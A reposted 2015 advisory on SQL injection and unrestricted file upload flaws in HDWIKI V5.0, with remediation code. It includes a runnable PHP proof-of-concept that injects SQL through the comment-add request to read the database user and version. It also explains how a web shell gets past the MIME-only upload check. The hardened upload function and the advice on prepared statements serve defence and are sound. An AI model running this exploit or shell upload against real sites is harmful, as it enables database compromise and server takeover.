
HDWIKI V5.0 Multiple SQL Injection Vulnerabilities / Executable File Upload Vulnerability and

Source: 自学PHP网 (zixuephp.com)    Date: 2015-04-17 13:03


HDWIKI V5.0 performs essentially no filtering on input variables, so it contains multiple SQL injection vulnerabilities.

Below is the injection code for the comment-posting location:

<?php
error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$POSTDATA='comment=ddddddddddddd&c_class=0&re_id=0&anonymity=0&code=undefined';

echo $html = send($POSTDATA);

function send($cmd) {
    global $host,$path;
    $message = "POST $path/index.php?comment-add-2,(select/**/concat(user(),0x5f,version())),1,1,1,1),(1 HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: ".$host."\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: ".$host."\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n";
    $message .= "Cookie: kaiyuan_tip_date=2%2C11; hd_sid=OBIyML; hd_auth=768anzIskveAg6VFdx6L41XBHI%2Be0Xofs%2BfBr4E%2Fj7Wh%2BEkYJRzFdHzMp4uMwA6IqIVhfWwR6CD267coIdhV\r\n\r\n";
    $message .= $cmd;

    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

Executable file upload vulnerability

The file upload code in attachement.php:

function douploadimg() {
        $imgname=$_FILES['photofile']['name'];
        $extname=file::extname($imgname);
        $destfile=$_ENV['attachment']->makepath($extname);
        $arrupload=file::uploadfile($_FILES['photofile'],$destfile);
        ……

The functions involved:


function extname($filename){
        $pathinfo=pathinfo($filename);
        return strtolower($pathinfo['extension']);
    }


function makepath($extname,$format='Ym'){
        return 'uploads/'.gmdate($format, $this->base->time + $this->base->setting['time_offset'])."/{$this->base->time}".util::random(8).'.'.strtolower($extname);
    }


function uploadfile($attachment,$target,$maxsize=1024,$is_image=1){
        $result=array ('result'=>false,'msg'=>'upload mistake');
        if($is_image){
            $attach=$attachment;
            $filesize=$attach['size']/1024;
            if(0==$filesize){
                $result['msg'] = '上传错误';
                return $result;
            }
            if(substr($attach['type'],0,6)!='image/'){// relies solely on the client-supplied MIME type to determine the file type
                $result['msg'] ='格式错误';
                return $result;
            }
            if($filesize>$maxsize){
                $result['msg'] ='文件过大';
                return $result;
            }
        }else{
            $attach['tmp_name']=$attachment;
        }
        $filedir=dirname($target);
        file::forcemkdir($filedir);
        if(@copy($attach['tmp_name'],$target) || @move_uploaded_file($attach['tmp_name'],$target)){
            $result['result']=true;
            $result['msg'] ='上传成功';
        }
        ……
    }

After the upload, the shell's URL can be seen in the image wiki (图片百科) section.

Excerpted from http://bbs.wolvez.org/viewtopic.php?id=208

Fix provided by www.2cto.com:

Apply input filtering to the problematic code above.
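As an added example (not HDWIKI's code and not the 2cto fix), here is a hardened counterpart to the `uploadfile()` routine above: the two weaknesses it addresses are trusting the client-supplied `$attach['type']` and letting the user-controlled extension from `extname()` reach the destination path. The function name `safe_uploadfile()`, the allowed-type list and the upload directory are assumptions for illustration.

```php
<?php
// Added example, not HDWIKI code: hardened upload handling.
// safe_uploadfile() and the $allowed whitelist are illustrative names/values.
function safe_uploadfile(array $attach, string $uploaddir, int $maxkb = 1024): array {
    $result = ['result' => false, 'msg' => 'upload mistake'];

    // Only accept files PHP itself received through a multipart upload.
    if (!isset($attach['tmp_name']) || !is_uploaded_file($attach['tmp_name'])) {
        return $result;
    }
    if ($attach['size'] <= 0 || $attach['size'] / 1024 > $maxkb) {
        $result['msg'] = 'file empty or too large';
        return $result;
    }

    // Never trust $attach['type'] or the original filename's extension: both are
    // attacker-controlled. Derive the type from the file content instead, and
    // require the libmagic result and the image header to agree.
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    $finfo   = new finfo(FILEINFO_MIME_TYPE);
    $mime    = $finfo->file($attach['tmp_name']);
    $imginfo = @getimagesize($attach['tmp_name']);
    if (!isset($allowed[$mime]) || $imginfo === false || $imginfo['mime'] !== $mime) {
        $result['msg'] = 'format error';
        return $result;
    }

    // Build the destination name server-side with a fixed extension from the
    // whitelist, so no user input reaches the path or the extension.
    $target = rtrim($uploaddir, '/') . '/' . gmdate('Ym') . '/'
            . bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    if (!is_dir(dirname($target)) && !mkdir(dirname($target), 0755, true)) {
        return $result;
    }
    // move_uploaded_file() only, never copy(): it refuses non-upload sources.
    // The upload directory should additionally have script execution disabled.
    if (move_uploaded_file($attach['tmp_name'], $target)) {
        $result = ['result' => true, 'msg' => 'upload success', 'path' => $target];
    }
    return $result;
}
```

The same principle applies to the comment-add injection shown earlier: the request parameters must be bound with prepared statements rather than interpolated into the SQL string.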
